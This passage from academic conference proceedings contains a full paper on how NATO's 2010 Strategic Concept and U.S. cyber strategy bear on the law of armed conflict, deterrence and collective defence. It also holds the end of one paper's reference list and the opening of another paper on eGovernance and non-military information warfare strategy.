PAIA Act (Promotion of Access to Information Act No 2 of 2000 as amended). (2000). Available from:<br />
http://www.dfa.gov.za/department/accessinfo_act.pdf (Accessed 10 October 2010).<br />
Republic of South Africa. (2010). Protection of Personal Information Bill. Available from:<br />
http://www.justice.gov.za/legislation/bills/B9-2009_ProtectionOfPersonalInformation.pdf (Accessed 10<br />
October 2010).<br />
RIC Act (Regulation of Interception of Communications and Provision of Communication-related Information Act).<br />
(2002). Available from: http://www.acts.co.za/ric_act/whnjs.htm (Accessed 10 October 2010).<br />
SA Constitution. (1996). Available from: http://www.info.gov.za/documents/constitution/index.htm (Accessed 10<br />
October 2010).<br />
Tiirmaa-Klaar, H. (2010). International Cooperation in Cyber Security: Actors, Levels and Challenges. Cyber<br />
Security 2010 Conference, Brussels, 22 September 2010.<br />
UN Information Officer. (2010). Delegates Consider Best Response to Cybercrime as Congress Committee<br />
Takes Up Dark Side of Advances in Information Technology. Available from:<br />
http://www.un.org/News/Press/docs/2010/soccp349.doc.htm (Accessed 10 October 2010).<br />
Warren, MJ. (2008). Terrorism and the internet. Chapter VI. In: Janczewski, L. & Colarik, AM. Cyber warfare and<br />
cyber terrorism. Information Science Reference: London.<br />
Williams, G. & Arreymbi, J. (2007). Is cyber tribalism winning online information warfare? ISSE/SECURE 2007<br />
Securing Electronic Business Processes (2007): 65-72.<br />
Wilson, C. (2007). Information Operations, Electronic Warfare and Cyberwar: Capabilities and Related Policy<br />
Issues. CRS Report for Congress. Available from: www.fas.org/sgp/crs/natsec/RL31787.pdf (Accessed 17<br />
September 2010).<br />
Cyber Strategy and the Law of Armed Conflict<br />
Ulf Haeussler<br />
National Defense University, Washington, USA<br />
ulf.haeussler@ndu.edu<br />
Abstract: At the time of writing, the author was Assistant Legal Advisor Operational Law, Headquarters,<br />
Supreme Allied Commander Transformation (NATO HQ SACT). The views expressed herein are the author's<br />
own and do not necessarily reflect the official position or policy of NATO and/or HQ SACT. At its Lisbon<br />
Summit (November 2010), NATO adopted its Strategic Concept. The U.S. may soon adopt its Cyberstrategy<br />
3.0 (originally expected for December 2010). Both strategy documents will contribute to a growing policy<br />
consensus regarding cyber security and defence as well as provide better policy insights regarding cyber offence.<br />
In doing so, they will contribute to a better understanding of how NATO and the U.S. want to prepare for, and<br />
conduct cyber warfare in a manner congruent with the law of armed conflict. In addition, they will determine to<br />
what extent this branch of the law needs to be better understood, developed, or reformed. Accordingly, this paper<br />
indicates how the existing legal and policy frameworks intersect with practical aspects of cyber warfare and<br />
associated intelligence activities, analyses how the new strategy documents develop and change the existing<br />
policy framework, and what repercussions this may have for the interpretation and application of the law of armed<br />
conflict. It also demonstrates how the new strategy documents inform the policy and legal discourse and hence<br />
help confirm that NATO and U.S. as well as other NATO Nations' cyber activities are, and will continue to be,<br />
lawful and legitimate.<br />
Keywords: NATO Strategic Concept 2010, U.S. Cyberstrategy 3.0, Law of Armed Conflict, collective security,<br />
collective defence<br />
1. Introduction<br />
Cyberspace is increasingly referred to as one of the global commons and as the fifth domain in which<br />
warfare may occur (Lynn 2010, 101). Activities in cyberspace as well as involving the use of cyber<br />
capabilities to create, or contribute to the creation of, effects in any one of the other commons, or<br />
domains, have attracted significant discussion and analysis among technical experts, policymakers,<br />
and legal scholars. The ensuing efforts to develop frameworks for cyberspace and the use of<br />
associated capabilities (hereinafter collectively referred to as 'cyberspace') bring various perspectives<br />
to bear. Cyberspace is multifunctional; it equally attracts private activities (with a strong business<br />
component) and governments' official conduct as well as associated competing, if not conflicting,<br />
interests. Not surprisingly, cyberspace has its unarguable dark side – on both its non-governmental<br />
and its governmental end. The range of challenges and threats associated with the dark side of<br />
cyberspace comprises, but is not limited to, privacy intrusions, financial loss, damage and destruction<br />
in the physical domains, the potential of injury or even death, and (other) adverse effects on the<br />
effectiveness of government. These challenges and threats reflect the large extent to which<br />
computers and other information and communication technology devices can be leveraged as<br />
weapons by non-governmental actors. Further challenges may arise out of policy positions adopted<br />
by some non-governmental actors. For instance, the so-called 'internet pirates' endorse the notion of<br />
a cyberspace beyond any government control whatsoever – a desire which, were it to come true,<br />
might exacerbate all other challenges and threats referred to above.<br />
Attempts to characterise cyber challenges and threats have usually used references to challenges<br />
and threats in the physical domains, to which the word 'cyber' is added as a qualifier, enabling the<br />
creation of catchwords such as cyber crime, cyber terrorism, and cyber attack. The terminology<br />
developed using this method is attractive because it triggers analogies with known phenomena.<br />
However, it is also prone to carrying misleading connotations since such analogies may easily fuel<br />
misconceptions. For instance, the terms 'cyber crime' and 'cyber terrorism' do not capture the whole<br />
range of non-governmental actors' malicious activities; moreover, they do not even attempt to address<br />
possible links between non-governmental actors and their potential governmental sponsors. By<br />
contrast, the term 'cyber attack' is too broad. Thus, information gathering activities may be referred to<br />
as cyber attacks, though they might not necessarily or directly cause tangible damage. The<br />
undifferentiated use of the notion of 'attack' may foster arguments by which a nation's inherent right of<br />
self-defence is considered relevant to cyber activities or actions which neither have nor cause<br />
potential or actual adverse effects. These examples may be indicative of a gap between technological<br />
realities and the terminology used in policymaking as well as legal interpretation.<br />
Following the cyber incident Estonia sustained in 2007 and the probable integration of a cyber line of<br />
operation in the Russian campaign against Georgia in 2008, the discussion and analysis regarding<br />
cyber challenges and threats have gathered new momentum. The recent Stuxnet incident might have<br />
taken this discussion and analysis to a turning point, for many observed that the Rubicon had been<br />
crossed regarding the development of real 'cyber weapons'. NATO's 2010 Strategic Concept and the<br />
expected U.S. Cyberstrategy 3.0 (will) represent a sophisticated approach towards cyber challenges<br />
and threats. As far as collective security and defence are concerned, they (will) confirm that the dark<br />
side of cyber involves more than just economic crime, and that most of its emanations can be<br />
effectively addressed through the existing mechanisms designed to maintain and restore<br />
international peace and security as well as the principles and rules governing the conduct of<br />
hostilities, on the one hand, and the protection of civilians and other individuals in the course of armed<br />
conflict, on the other hand. At the same time, they (will) indicate why and how these existing<br />
frameworks support preventive measures and hence enhance the full spectrum of collective cyber<br />
security and defence. As a result, they (will) inform the interpretation and application of both branches<br />
of the law of armed conflict, that is, the legal framework informing decision-making processes on<br />
whether as well as how to use force in international relations or against non-governmental actors.<br />
2. Developing cyber policy consensus regarding collective defence<br />
Like any other legal source, international law, including the law of armed conflict, is rooted in policy<br />
consensus. For the challenges and threats associated with the dark side of the cyberspace to be<br />
captured by the law of armed conflict they must be an integral part of the policy consensus regarding<br />
the relevant international agreements and customary rules. Two basic concepts used by the law of<br />
armed conflict stand out in this respect: the notion of 'armed attack' (cf. Article 51 of the UN Charter,<br />
Article 5 of the North Atlantic Treaty, and Article 7 of the Rio Treaty), triggering the right of individual<br />
and collective self-defence; and the notion of 'attack' (cf. Article 49 of the First Additional Protocol to<br />
the Geneva Conventions), guiding many aspects of the conduct of hostilities within an armed conflict.<br />
These terms of art also reflect the fundamental differentiation within the law of armed conflict between<br />
the principles and rules that govern the legality of the use of force in international relations (jus ad<br />
bellum) and the conduct of hostilities (jus in bello).<br />
Political and military strategies have an important role to play in the process of consensus-building<br />
regarding international law. They reflect how States individually and collectively assess their scope of<br />
action – assuming for this purpose that no State has a genuine desire to consider acting, or actually to<br />
act, in a deliberately illegal manner. If this assumption is accepted, then NATO's Strategic Concept 2010 indicates<br />
more than that cyber incidents may trigger its collective security and defence mechanisms. It also<br />
confirms, as a matter of policy consensus, that cyber incidents are capable of amounting to an armed<br />
attack within the coordinates of the law of armed conflict. Likewise, the U.S. Department of Defense's<br />
readiness to coordinate its cyber defence effort across the government, with allies, and with partners<br />
in the commercial sector (cf. Lynn 2010, 103) does not only leverage collective security and defence<br />
as one aspect of the U.S. response to cyber threats. It also indicates that nothing in the law of armed<br />
conflict is considered an obstacle to utilising these mechanisms.<br />
Since an effort at developing consensus among 28 sovereign States will yield a different result than<br />
policy determinations within one sovereign State's government, the development of NATO cyber<br />
defence policy up to 2010 will be analysed to identify the Euro-Atlantic common denominator – a<br />
denominator of which, one would expect, the drafters of U.S. Cyberstrategy 3.0 are fully aware.<br />
NATO's consensus-building process regarding cyber defence policy started with its Strategic Concept<br />
1999. In this document, NATO observed that 'state and non-state adversaries may try to exploit the<br />
Alliance's growing reliance on information systems through information operations designed to disrupt<br />
such systems' (NATO 1999, paragraph 23). However, only after Estonia had sustained the well-known<br />
cyber incident did NATO actually adopt a cyber defence policy and start developing<br />
structures and authorities to carry it out (NATO 2008, paragraph 47). Roughly two years after the<br />
cyber incident sustained by Estonia and nearly a year after Russia had possibly integrated a cyber<br />
line of operation in its campaign against Georgia (cf. Gates 2009, 5; Ilves 2010; but see also<br />
Independent International Fact-Finding Mission 2010, Vol II, 217sqq), NATO still conceded that<br />
despite the establishment of its Cyber Defence Management Authority and improvements of the<br />
existing NATO Computer Incident Response Capability (NCIRC), its cyber defence capabilities yet<br />
had to achieve full readiness (NATO 2009, paragraph 49). That notwithstanding, since 2008 NATO<br />
policy couples the notions of protecting key information and communication systems on which the<br />
Alliance and Allies rely with countering – later rephrased as responding to – cyber attacks using its<br />
own cyber defence capabilities as well as leveraging linkages between NATO and national authorities<br />
(NATO 2008, paragraph 47 and NATO 2009, paragraph 49), and – envisaged since 2009 –<br />
appropriate partnerships and cooperation (NATO 2009, ibid.).<br />
NATO policy developed since 1999 is correctly based on the observation that NATO and its Nations<br />
rely significantly on information and communication systems, a reliance susceptible to exploitation. It is<br />
worthwhile mentioning that the observation referred to is not a reference to the notion of 'cyber<br />
exploitation' which by definition captures non-destructive information gathering activities which may be<br />
performed by strategic competitors and potential adversaries (Owens et al. 2009, 1). Conversely, in<br />
using the term 'disrupt', NATO’s Strategic Concept 1999 had introduced language which covers both<br />
potential destructive effects of cyber attacks and other adverse effects of the same scale and gravity.<br />
(Note that the term 'to disrupt' is defined as 'to cause disorder in something' (Oxford 1989, 348);<br />
'causing disorder' in ICT is tantamount to causing it to lose part or all of its operability.) The language<br />
used at a later stage does not indicate a change of this appraisal of the possible consequences of<br />
cyber attacks. In particular, the notion of countering cyber attacks, used in the Bucharest Summit<br />
Declaration 2008, is sufficiently close to the general doctrinal notion of counterattack to suggest that<br />
its drafters had the idea of counter-offensive in mind. The fact that NATO later substituted the notion<br />
of 'responding' to cyber attacks for the initially used term 'countering' them does not contradict this<br />
assessment since countering cyber attacks is but one possible option for responding to them.<br />
Actually, 'responding' is broader in scope; in addition to counter-offensive measures it also captures a<br />
wide range of other measures including those of a political and diplomatic nature.<br />
Taking the different points of view regarding the legal nature of cyber attacks into account, NATO's<br />
policy documents help consolidate the developing consensus regarding the interpretation of the law<br />
of armed conflict in cyber matters. Fully aware of the unsettled legal nature of cyber attacks, NATO<br />
has agreed to multiple documents which in unison do not rule out that cyber attacks – initially referred<br />
to as information operations – may be considered as destructive, or potentially destructive, in nature.<br />
Given that the capacity to be destructive, or potentially destructive, in nature is a quintessential<br />
characteristic of both armed attacks as defined for the purposes of the jus ad bellum and attacks as<br />
defined for the purposes of the jus in bello, NATO's policy declarations necessarily imply the<br />
Alliance’s tacit endorsement of the view that cyber attacks – at least theoretically – can have the<br />
nature of armed attacks and/or attacks, as the case may be. It is important to note that, depending on<br />
the circumstances, an act opening hostilities may coincidentally be an armed attack from a jus ad<br />
bellum perspective and an attack from a jus in bello perspective. However, this coincidence would be<br />
one of fact rather than an amalgamation of these notions which belong to different branches of<br />
international law and hence warrant separate assessment.<br />
International treaty law often captures new factual developments through subsequent agreement<br />
regarding the interpretation of a treaty or the application of its provisions (cf. Article 31(3)(a) of the<br />
Vienna Convention on the Law of Treaties). Whilst NATO policy does not represent agreement which<br />
would bring all cyber attacks within the ambit of the North Atlantic Treaty and other relevant<br />
international agreements, it does a fortiori not exclude individual cyber attacks from being considered<br />
as an armed attack and/or an attack.<br />
NATO's Strategic Concept 2010 confirms and reinforces earlier policy. Its assessment of the security<br />
environment states that cyber attacks 'can reach a threshold that threatens national and Euro-Atlantic<br />
prosperity, security and stability', and that foreign militaries can be 'the source of such attacks' (NATO<br />
2010a, at paragraph 12). In addressing Article 5 of the North Atlantic Treaty, NATO stresses its<br />
responsibility 'to protect and defend our territory and our population against attack' (id., paragraph 16).<br />
Whilst critical infrastructure is captured by the notion of territorial defence, the reference to the<br />
population should be read as comprising key elements of statehood such as governability – essential<br />
to human security – and the integrity of democratic decision-making – an essential tenet of<br />
participatory democracy (Häußler 2010). NATO has also expressly embraced the need to further<br />
develop its 'ability to prevent, detect, defend against and recover from cyber-attacks' (NATO 2010a,<br />
paragraph 19) and its aim to 'carry out the necessary … information exchange for assuring our<br />
defence against ... emerging security challenges'. The notion of 'emerging security challenges',<br />
though not expressly defined, is illustrated by the portfolio of the recently established NATO<br />
Headquarters directorate carrying the same name, which comprises challenges arising in and out of<br />
the cyberspace. The Lisbon Summit Declaration further elaborates and reinforces the full integration<br />
of cyber defence in NATO's collective security and defence framework (NATO 2010b, paragraph 47).<br />
3. Leveraging collective defence for collective security through deterrence<br />
Credible deterrence is a complex achievement which traditional strategy used to build on multiple<br />
pillars, involving containment (including through the prospect of retaliation) and arms control (that is,<br />
confidence building and disarmament). NATO and the U.S. use different definitions of deterrence in<br />
military doctrine. These definitions have in common that both are concerned with potential<br />
adversaries' perceptions of the relationship between action and counteraction. However, they<br />
describe the method to influence potential adversaries' mindsets in fairly different manners. NATO<br />
defines the notion of deterrence as '[t]he convincing of a potential aggressor that the consequences of<br />
coercion or armed conflict would outweigh the potential gains'; the definition continues to observe that<br />
'[t]his requires the maintenance of a credible military capability and strategy with the clear political will<br />
to act' (NATO Glossary, 2-D-6). By contrast, the U.S. definition of deterrence is more outspoken about<br />
the method by which to influence potential adversaries' mindsets. It clearly favours containment,<br />
explaining that '[d]eterrence is a state of mind brought about by the existence of a credible threat of<br />
unacceptable counteraction'. On this basis, it is able to describe the nature of the mindset desired on<br />
the part of potential adversaries in capturing the notion of deterrence through a reference to '[t]he<br />
prevention from action by fear of the consequences' (DoD Dictionary, 139).<br />
International security is a product of multiple factors of which deterrence is but one. Resilience<br />
towards potential threats and rules incentivising desired conduct are equally important; they are tools<br />
to prevent differences from growing into disputes, or the pacific settlement of the latter, as the case<br />
may be. However, experience confirms that incentivising tools will not always suffice to avert all<br />
potential threats. Accordingly, cyber deterrence – based on the availability of defence and counter-offence<br />
capabilities as well as the political will to use them, if required – will make a viable contribution<br />
to international security. NATO is ready for cyber deterrence. It is continuously improving relevant<br />
capabilities, and the Strategic Concept 2010 has tied the knot on the evolving integration of cyber<br />
defence in the notion of collective defence.<br />
NATO is not only increasingly well prepared to develop effective deterrence against cyber attacks which the<br />
organisation itself or its members may have to face in the future. The Alliance is also able, as a matter<br />
of policy, to deter undesirable uses of cyberspace affecting its operations through a cyber line of<br />
operation, regardless of whether those operations serve the purpose of collective defence (Article 5 of the North<br />
Atlantic Treaty) or have the character of Non-Article 5 Crisis Response Operations (Häußler 2011,<br />
168).<br />
In light of the foregoing, NATO's policy choice not to exclude cyber attacks from its collective defence<br />
mechanism (Article 5 of the North Atlantic Treaty) has significant implications for deterrence.<br />
As long as its collective defence mechanism is a viable option, the Alliance can – a maiore ad minus –<br />
even more convincingly tackle challenges associated with cyberspace through its collective security<br />
mechanism. Whilst the latter primarily relies on consultations as envisaged in Article 4 of the North<br />
Atlantic Treaty, its invocation may result in effective measures short of the use of force. As indicated<br />
by the single reported case of an express invocation of Article 4 by a NATO Nation, consultations<br />
pursuant to this article may lead to the deployment of appropriate capabilities – up to and including<br />
those represented by armed forces – to respond to the aforementioned security threats. In February<br />
2003, Turkey asked for consultations concerning its defence needs arising out of the impending<br />
resumption of hostilities against Iraq (Gallis 2003, 1). The consultations were conducted by NATO's<br />
Defence Planning Committee which requested military advice from NATO's Military Authorities, and,<br />
having obtained the latter, authorised the implementation of defensive measures (NATO DPC 2003).<br />
In a similar manner, in the event of a cyber incident, NCIRC Rapid Reaction Teams (RRTs) may<br />
support national Computer Emergency Response Teams (CERTs) (cf. NCSA 2009). By reinforcing<br />
existing defences, the deployment of RRTs may make an effective contribution to deterring unfriendly<br />
activities whose prospect of success they reduce or deny. Accordingly, consultations may result in<br />
preventive deterrence, provided they are not treated as a means of last resort in a misguided approach<br />
of "talking only" while no action is taken.<br />
As indicated above, NATO's cyber security and defence policy is geared towards supporting national<br />
efforts. This approach extends the consolidated practice of cooperation within NATO to<br />
cyberspace. As illustrated by the response to the 9/11 attack on the U.S. as well as the steps<br />
Ulf Haeussler<br />
following the invocation of Article 4 by Turkey, NATO's collective security and defence mechanisms<br />
rely on the assessment of the Nation affected. Though NATO first and foremost provides an umbrella<br />
enabling Allies' mutual support, it may also decide to launch operations led by the Alliance, such as<br />
Operation Active Endeavour following the 9/11 attack. NATO's strategic policy choices regarding<br />
cyber security and defence may in a similar manner serve as an interface for connecting national<br />
security and defence efforts. After its adoption, Cyberstrategy 3.0 may demonstrate what the U.S.<br />
expects as well as what it is prepared to contribute to achieve such 'greater levels of cooperation [as]<br />
needed to stay ahead of the cyberthreat' (Lynn 2010, 105).<br />
4. Cyberstrategy 3.0 – cyber defence as an integral part of national defence<br />
NATO's positive acknowledgement, through its strategic policy consensus, of a nation's sovereign<br />
right to consider cyber defence as an integral part of national security and defence, has clear legal<br />
implications. It is this acknowledgement by which NATO has confirmed that national cyber security<br />
and defence is eligible for support through its collective security and defence mechanisms. That said,<br />
there are two different ways of looking at national cyberstrategy. On the one hand, a national<br />
cyberstrategy is likely to represent the codification of national cyber security and defence concerns<br />
ranging from a description of the situation, own and adversarial, through a survey of the broader<br />
operating environment to the resulting assessment and conclusions. On the other hand, a national<br />
cyberstrategy may also indicate in what situations NATO could theoretically expect to receive<br />
requests for consultation under Article 4, or for collective self-defence under Article 5 of the North<br />
Atlantic Treaty, as well as what capabilities might be available to support collective efforts made under<br />
the auspices of the Alliance.<br />
The situation in cyberspace in which constitutional democracies in general, and NATO Nations in<br />
particular, are likely to find themselves is captured in the observation that '[i]n less<br />
than a generation, information technology in the military has evolved from an administrative tool for<br />
enhancing office productivity into a national strategic asset in its own right' (id., 98).<br />
Adversaries can easily exploit this situation by leveraging off-the-shelf technology which is not only<br />
available at comparatively low cost but can also be put to use by a limited number of personnel – '[a]<br />
dozen determined computer programmers' (ibid.) – 'if they find a vulnerability to exploit' (ibid.). The<br />
unpleasant reality is that 'today anyone with a computer can engage in some level of cyber<br />
destruction' (Vamosi 2011, quoting the National Defense University's F.D. Kramer). In addition, the<br />
estimate that programming the Stuxnet code may have taken about half a year indicates that<br />
warning periods regarding a force build-up in cyberspace are much shorter than those regarding a<br />
conventional force build-up. Indeed, there may be no warning period at all if, as in the case of<br />
Stuxnet, an adversary manages to launch a zero-day attack or leverage a zero-day exploit (Wikipedia,<br />
Zero Day Attack).<br />
That said, it is not surprising that '[i]n cyberspace, the offense has the upper hand', a factor requiring a<br />
flexible strategy since '[i]n an offense-dominant environment, a fortress mentality will not work' (Lynn<br />
2010, 99). Accordingly, evolving U.S. cyber strategy is likely to put less emphasis on containment<br />
than traditional strategy as embodied in military doctrine. According to the U.S. Deputy Secretary of<br />
Defense, 'traditional Cold War deterrence models of assured retaliation do not apply to cyberspace,<br />
where it is difficult and time consuming to identify an attack's perpetrator' (ibid.). This observation<br />
does not simply shift the emphasis from containment to arms control. On the contrary, '[t]raditional<br />
arms control regimes would likely fail to deter cyberattacks because of the challenges of attribution,<br />
which make verification of compliance almost impossible.' (id., 100).<br />
In essence, this means that both traditional elements of deterrence seem to be considered<br />
unsatisfactory for the purposes of cyber deterrence. It is hence fairly unlikely that efforts made by<br />
some States to leverage support for cyber arms control within the United Nations will yield tangible<br />
results any time soon. Whilst cyber deterrence does not abandon the approach based on influencing<br />
potential adversaries' mindsets (Vamosi 2011) it will most likely have to rely on different methods to<br />
achieve this desired effect. In particular, cyber 'deterrence will necessarily be based more on denying<br />
any benefit to attackers than on imposing costs through retaliation' (Lynn 2010, 99sq). This approach<br />
couples elements of 'defensive resilience [within] cyber networks' (Vamosi 2011, quoting F.D. Kramer)<br />
and active defence. To that end, it may require different models of 'international norms of behavior in<br />
cyberspace … such as that of public health or law enforcement' (Lynn 2010, 100). Normative models<br />
derived from international environmental law might also be instrumental. In the U.S., active defence of<br />
defence sector computer networks complements 'ordinary computer hygiene, which keeps security<br />
software and firewalls up to date, and sensors, which detect and map intrusions' (id., 103). Defence<br />
sector networks rely on systems that, using (signals) intelligence warnings, 'automatically deploy<br />
defenses to counter intrusions in real time' (ibid.). 'They work by placing scanning technology at the<br />
interface of military networks and the open Internet to detect and stop malicious code before it passes<br />
into military networks' (ibid.). Moreover, the notion of active defence also covers the effort to detect<br />
intruders who have managed to escape detection at the interface (ibid.).<br />
In sum, the evolving U.S. approach of defensive resilience coupled with active defence and NATO's<br />
emerging notion of preventive deterrence seem to correspond harmoniously. As cyberstrategy<br />
development continues, the impact of NATO's and national approaches on the conduct of military<br />
operations in general and the conduct of hostilities in particular will require associated legal analysis.<br />
Rather than focusing on cyber operations in isolation, this analysis will have to consider that cyber<br />
warfare may become part of a spectrum of military responses available to the relevant policymakers<br />
(cf. Vamosi 2011).<br />
5. Conclusion<br />
From an international law perspective, the choices regarding cyber security and defence made by<br />
NATO's Strategic Concept 2010 correspond to questions related to the legality of use of force (jus ad<br />
bellum) and implicitly defer questions pertaining to the legal framework governing the conduct of<br />
hostilities (jus in bello) to future analysis. National cyberstrategy development points in the same<br />
direction. From an overall perspective, cyberstrategy development has the demonstrated potential to<br />
accelerate consensus building processes regarding the question of whether cyber attacks can be<br />
matters of national security and defence, including through effective deterrence, and in that capacity<br />
also trigger collective security and defence mechanisms like those based on the North Atlantic Treaty.<br />
At the same time, existing and evolving cyberstrategies do not yet provide all necessary insights<br />
into important questions, such as how to leverage normative models of public health and<br />
environmental protection, or how to adapt to the realities of cyberspace the notions of<br />
combatancy and direct participation in hostilities, and the targetability of civilian objects turned military<br />
objectives. Answering these questions still involves challenges in light of technical realities which may<br />
defy the development of the prognoses required to form an expectation regarding collateral damage<br />
and an anticipation of military advantage with a sufficient degree of predictability.<br />
References<br />
Gallis, P. (2003) NATO’s Decision-Making Procedure (CRS Report for Congress, Order Code RS21510, 05 May<br />
2003), http://www.fas.org/man/crs/RS21510.pdf<br />
Gates, R.M., U.S. Secretary of Defense (2009) "The National Defense Strategy", Joint Forces Quarterly, issue<br />
52, 1st quarter 2009, 1-7<br />
Häußler, U. (2010) "Cyber Security and Defence from the Perspective of Articles 4 and 5 of the North Atlantic<br />
Treaty", Tikk, E. and Talihärm, A.-M., International Cyber Security Legal & Policy Proceedings, 100-126<br />
Häußler, U. (2011) "Crisis Response Operations in Maritime Environments", Odello, M. and Piotrowicz, R.,<br />
International Military Missions and International Law (forthcoming: Brill, Amsterdam), 161-210<br />
Ilves, His Excellency Mr. T.H., President of the Republic of Estonia (2010) Opening Address at the June 2010<br />
Cyber Conflict Conference, http://www.ccdcoe.org/conference2010/329.html; cf.<br />
http://www.nato.int/cps/en/SID-B2AD4DE6-E0B91B4E/natolive/news_64615.htm?<br />
Independent International Fact-Finding Mission on the Conflict in Georgia established by the European Union<br />
(2010), Report, Vol II<br />
Lynn, W.J. III (2010) "Defending a New Domain – The Pentagon’s Cyberstrategy", Foreign Affairs, Volume 89, Number 5,<br />
97-108<br />
NATO (1999) The Alliance's Strategic Concept dated 24 April 1999,<br />
http://www.nato.int/cps/en/natolive/official_texts_27433.htm<br />
NATO (2008) Bucharest Summit Declaration dated 03 April 2008,<br />
http://www.nato.int/cps/en/natolive/official_texts_8443.htm<br />
NATO (2009) Strasbourg / Kehl Summit Declaration dated 04 April 2009,<br />
http://www.nato.int/cps/en/natolive/news_52837.htm?mode=pressrelease<br />
NATO (2010a) Active Engagement, Modern Defence – Strategic Concept 2010 dated 19 November 2010,<br />
http://www.nato.int/lisbon2010/strategic-concept-2010-eng.pdf<br />
NATO (2010b) Lisbon Summit Declaration dated 20 November 2010,<br />
http://www.nato.int/cps/en/natolive/official_texts_68828.htm<br />
NATO Defence Planning Committee (DPC) (2003) Decision Sheet, http://www.nato.int/docu/pr/2003/p030216e.htm,<br />
cf. Press Release (2003)013 at http://www.nato.int/docu/pr/2003/p03-013e.htm<br />
NATO, NATO Glossary of Terms and Definitions (AAP-6) (annually updated publication) (quoted as NATO Glossary)<br />
NCSA (2009) "NCSA Supports the Cyber Coalition 2009" (undated),<br />
http://www.ncsa.nato.int/news/2009/20091217_NCSA_Supports_the_Cyber_Coalition_2009.html<br />
Owens, W.A., Dam, K.W. and Lin, H.S. (2009) (for the National Research Council) Technology, Policy, Law, and<br />
Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities<br />
Oxford University Press (1989) Oxford Advanced Learner's Dictionary<br />
U.S. Department of Defense (DoD) Dictionary of Military and Associated Terms as amended through April 2010<br />
(JP 1-02) (quoted DoD Dictionary)<br />
Vamosi R. (2011) The US Needs To Learn To Limit–Not Win–A Cyber War,<br />
http://blogs.forbes.com/firewall/?p=2604<br />
Wikipedia "Zero Day Attack", http://en.wikipedia.org/wiki/Zero-day_attack (last visited 15 November 2010)<br />
eGovernance and Strategic Information Warfare – non<br />
Military Approach<br />
Karim Hamza and Van Dalen<br />
Maastricht School of Management, Netherlands<br />
hamza@msm.nl<br />
dalen@msm.nl<br />
Abstract: Most developed governments, active in reaping the benefits of eGovernance, have nowadays<br />
discovered the threats of this new approach too. They invest massively to cope with today's highly complex<br />
decision-making systems, with dramatic changes in the economy, in technology and in Information Warfare<br />
threats, and with governments' own changing strategies. This creates challenges with respect to matching<br />
decision-making structures. eGovernance is defined by UNESCO as "the use of ICT (Information and<br />
communication technologies) by different actors of the society with the aim to improve their access to information<br />
and to build their capacities". It may be expected that eGovernance will gain strategic importance for many<br />
governments and that its concepts and tools will develop dramatically in the coming decade. This will raise the<br />
urgency and importance of protecting government decision-making processes from unsolicited, disturbing<br />
external or internal interference. Security is critical to the success of any eGovernance framework, since such<br />
governance frameworks will to some degree be open to interactions with different "stakeholders", internal (within the<br />
boundaries of the state, e.g. pressure groups, political parties, businesses, citizens) or external (e.g. other<br />
states, multinational businesses, worldwide operating malicious organizations), who may influence the decision-making<br />
process in government, create political pressure or even start a cyber-war by making use of<br />
eGovernance frameworks. This raises a number of prevention issues to cope with, such as instability of the decision-making<br />
processes, or even instability of real development processes in states. It motivates efforts to add to the<br />
design process of eGovernance frameworks a new dimension, popularly labeled "Information Warfare Strategy",<br />
with the aim of building safeguarding tools into existing and future eGovernance frameworks, to prevent abuse of<br />
such frameworks in practical government decision cases. Traditionally there is a distinction between military and<br />
non-military approaches. The question has to be raised how far a distinction between technology (ICT) and<br />
non-technology tools (like diplomacy, or legal instruments) would be more appropriate. However, we have to recognize that any<br />
line of distinction is arbitrary and will require some dynamics, because the parties involved will learn and<br />
improve.<br />
Keywords: eGovernment, government transformation, public sector information systems, eGovernance<br />
framework, information warfare, non-military strategies<br />
1. Introduction<br />
Rapid change and development in the concepts of eGovernance and Strategic Information Warfare<br />
make it necessary to seek a clear definition of both terms, to examine their relation to each other, and<br />
to consider how they can impact a government or state. Preliminary findings show that the main elements<br />
common to these definitions are information and technology. Information is commonly seen as driving a revolution which<br />
needs specific attention, as Drucker noted: “The next information revolution is well underway. But it<br />
is not happening where information scientists, information executives, and the information industry in<br />
general are looking for it. It is not a revolution in technology, machinery, techniques, software, or<br />
speed. It is a revolution in concepts” (Drucker, 1998). From a defensive point of view,<br />
Dearth observed: “Defense is no longer the relatively straightforward issue of the sort and extent of<br />
physical measures that need to be taken to protect one’s valued assets. Many of the assets requiring<br />
protection are in the civil sector, but the protection of them is perhaps not best or properly done by<br />
military means” (Dearth, 2001). This requires tools and techniques which are not only physical but also<br />
conceptual, and the use of non-military approaches to protect the government information represented in<br />
eGovernance.<br />
The presence of threats such as terrorists, competitors, state enemies and malicious organizations makes<br />
information warfare a very important concern for governments and for the private sector attached to<br />
eGovernance frameworks. It raises the need to develop a strategic information warfare posture that<br />
protects several dimensions: military, physical, economic, political, and social (RAND, 1996).<br />
Governments have to develop technological as well as non-technological tools and mechanisms that<br />
can supplement dynamic eGovernance frameworks. Application domains encompass fields like<br />
Political, Legal and Diplomatic. Interaction between agencies inside and outside the government, in<br />
addition to international affairs, will be needed to define international legal regulations and political<br />
channels to control relevant threats. In the end, it will certainly require a (re)definition of the distribution<br />
of responsibilities for international legal arrangements in case of legal disputes, such as those taking<br />
place in the United Nations or NATO. Special attention has to be devoted to the problem of void<br />
governance spaces in this continually changing playing field, which may sometimes call for ad-hoc<br />
governance solutions.<br />
This research examines non-military and non-technology approaches to Strategic Information Warfare<br />
related to the development of an eGovernance Framework Design Process Model with regard to the<br />
Economic, Political and Social dimensions.<br />
With the following concentrations:<br />
Definition of eGovernance framework<br />
Definition of Strategic Information Warfare<br />
Types of Information Warfare: Cyber War / Cyber Crime / Espionage<br />
Types of threats Internal / External and State / Non State<br />
Importance of eGovernance National security and the need to be covered in Information warfare<br />
strategies.<br />
Non Military response: Policies, Laws, Diplomacies, Awareness and Media<br />
Adaptability on dynamic eGovernance framework<br />
What conditions of Strategic Information Warfare have to be taken into account in the design<br />
process of eGovernance frameworks<br />
All conditioned by fundamental civil rights to interact with governments and the control on the legality<br />
of such approaches.<br />
2. eGovernance framework<br />
The term ‘eGovernance’ has become a very common expression in the last couple of years,<br />
but there is no standard definition, since different governments and organizations use it<br />
to suit specific aims or objectives. Commonly the term ‘eGovernment’ is used instead of<br />
‘eGovernance’ due to confusion between the definitions of the two terms, although the former denotes the<br />
infrastructure of eGovernance, while eGovernance covers a broader scope.<br />
Governance focuses on what the government does to make sure that all<br />
concerned stakeholders are involved in the decision process and that outcomes are evaluated; it can also be<br />
applied at the corporate level. Governance comes in different types, such as Corporate Governance, Project<br />
Governance, Good Governance, IT Governance, multi-level governance and, finally, eGovernance,<br />
which focuses on the function of governance using technology and information systems as a tool.<br />
The most common definition of eGovernance is that of UNESCO:<br />
